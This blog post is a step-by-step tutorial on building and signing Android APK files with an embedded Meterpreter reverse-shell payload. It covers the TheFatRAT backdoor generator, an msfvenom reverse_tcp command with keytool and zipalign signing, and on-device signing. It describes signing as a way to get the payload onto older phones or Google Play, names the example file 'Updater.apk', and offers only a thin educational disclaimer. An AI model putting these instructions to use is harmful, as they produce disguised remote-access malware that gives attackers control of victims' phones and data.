www.SoftStimulatorsInc.us

Recent Posts

Sign the APK File with Embedded Payload

Hi My Friends,

Today, I`m gonna show you: "How To Sign the APK File with Embedded Payload". The following Methods work 100%. So, Follow the steps carefully. But before getting started, if you are a beginner, then read the following Answers first...
Q: Why we have to Sign the APK File?
In Modern Android Phones, Un-Signed APK files can be Easily installed. But Older versions of Android does not Support the installation of Unsigned APK files. This is not a common Problem. But for Publishers and Hackers, it can create a lot of problem, because Unsigned APK files give error on Older Android Versions & cannot be EVEN Uploaded on Google Play or Play Store.
To Manually & Properly Sign the APK, you have to Follow the Following steps Carefully!
DISCLAIMER : This Thread is only for Education Purposes. I will not be Responsible of Any Illegal use of this information. Try not to HACK the Androids, other than your`s.
Q: How to Sign APK File?
Signing the APK is not so Difficult. You have to be Patient, and Comment below if you face any problems or errors. So, I`ve listed THREE Methods below to Sign the APK FILE. Method#1 is Easy but requires 700mb of disc space for installing required files, Method#2 is a bit Difficult but does`nt requires much space, but Method #3 is EASIEST Method of signing the APK File (It can only be done on android) .
So Lets Start ...
Method #1Using TheFatRAT
Requirements
1). Kali LinuX (Latest Version is Preferred)
2). TheFatRAT (Installation instructions are Discussed Below)
3). At Least 500mb Internet Data (For Proper Downloading of TheFatRAT)
Installation
1). First You Have to Download TheFatRAT. For this, enter the following command on Terminal :
git clone github.com/Screetsec/TheFatRat.git 
Now the Downloading of TheFatRAT will get start. Remember, it will install in your ROOT folder.
2). When the Downloading Complete, (In Same Terminal) Enter :
cd TheFatRat
Then :
chmod +x setup.sh && ./setup.sh
Now wait till it Install its Components. It may take a while.
More Information About TheFatRAT can be found here :
github.com/Screetsec/TheFatRat
Signing the APK File
First of all, Remember that Option #5 of TheFatRAT does not works properly. So ignore it.
1). When Installation of TheFatRAT Completes, Open a new Terminal, and Enter:
fatrat
(Just Like we enter msfconsole etc)
Wait till it load its components Completely and the following Screen Appear.
2). Select Option #1 , (To select, Just type 1 and press Enter)
After Selecting 1, It may look like this:
3). Select Option #3
4). Select your IPv4 Address in Set LHOST IP: (I`m typing LHOST: 0.0.0.0 for example) and Your desired port in Set LPORT: (You can Type 4444 or 8080)
If you don`t know how to find IP address, Visit WhatIsMyIP Website , (I think you already knew that :)
5). After Entering your IP & Port, Enter Desired name for output file (i.e. payloadapk) when it ask.
6). Now Select one of 1st three Options (Option #3 is preferred)
7). Now wait till it Completely Generate SIGNED APK File. If you see Following Screen:
Then ,
|==================>DONE <================|
| You have Successfully Generated SIGNED APK |
|==================> FILE <=================|
Location
Your SIGNED Apk File, with Embedded Payload can be found here :
/root/TheFatRat/backdoored/payloadapk.apk
Method #2Signing APK Manually
Requirements
1). Kali LinuX (Latest Version is Preferred)
2). Java v8 or above (Latest Version is Preferred)
3). ZipAlign Tool (Download it HERE , Install instructions included)
Installation
1). Latest version of JAVA is already installed in Kali LinuX. So you don`t need to download it Manually.
2). Zip-Align Tool can be found HERE. Installation instructions are Discussed there. If you have any Problems, Try 1st Method or Post them in Comments Section.
3). Here I am gonna Generate a Key named key.jksfor payloadapk.apk , which is already generated by msfvenom command
Signing the APK File Manually
1). First, generate an Un-Signed APK File with Embedded Payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(your-IP) LPORT=(desired-port) R > payloadapk.apk
2). Now we are gonna Generate a key key.jks with KeyTool. For this, type in Terminal (Screenshot Below):
keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias my-alias
3). Enter a Remember-able KeyStore Password. (i.e. 123456)
4). Now, it will ask about your Personnel Information. Just Randomly fill the Form (i.e. 777), and finally Type: yes , This will Successfully Generate a key.
6). BINGO...!!!!!!!! APK file has been signed. Now the most important step; Zip Aligning is Left, Just type the following command in terminal, and GET the Signed payloadapk.apk:
zipalign -v 4 payloadapk.apk payloadapk-Signed.apk
|==================>DONE <================|
| You have Successfully Generated SIGNED APK |
|==================> FILE <=================|
Location
Your Manually SIGNED Apk File, with Embedded Payload can be found here :
/root/payloadapk-Signed.apk
Method #3Signing APK on Android
Requirements
1). MiXplorer File Explorer (Download latest version from UpToDown Website)
2). MiX Signer (Download it from Play Store)
Steps to Sign APK File
Download MiXplorer File Explorer.Download its Addon: MiX Signer (Both links are already posted above)After that, just open MiXplorer File Managerand head to Un-Signed APK File (here, I named it as Updater.apk).
Long Press on Un-Signed APK File and select MENU button on top right corner of MiXplorer, then select SIGN.
It will display variety of options to sign APK File (AUTO is preferred).
Select AUTO (for example) to Automatically & Successfully sign the apk file.
Now, your APK file: (filename)-signed.apk is successfully signed and fully functional, also is of 9.9KB of size!.
Note: I`ve done a lot of work to get this information from the whole internet, and finally got these three Solutions. There is also another Method to sign the apk file, and that is; using Android Development Kit. Its Size was too large, so I did`nt downloaded it and find these Alternative ways of signing APK file, which are much easier than Android Development Kit.
Sign the APK File with Embedded Payload Sign the APK File with Embedded Payload Reviewed by Shirley Bloggastron on 11:32 AM Rating: 5

No comments:

Note: Only a member of this blog may post a comment.

Music

Powered by Blogger.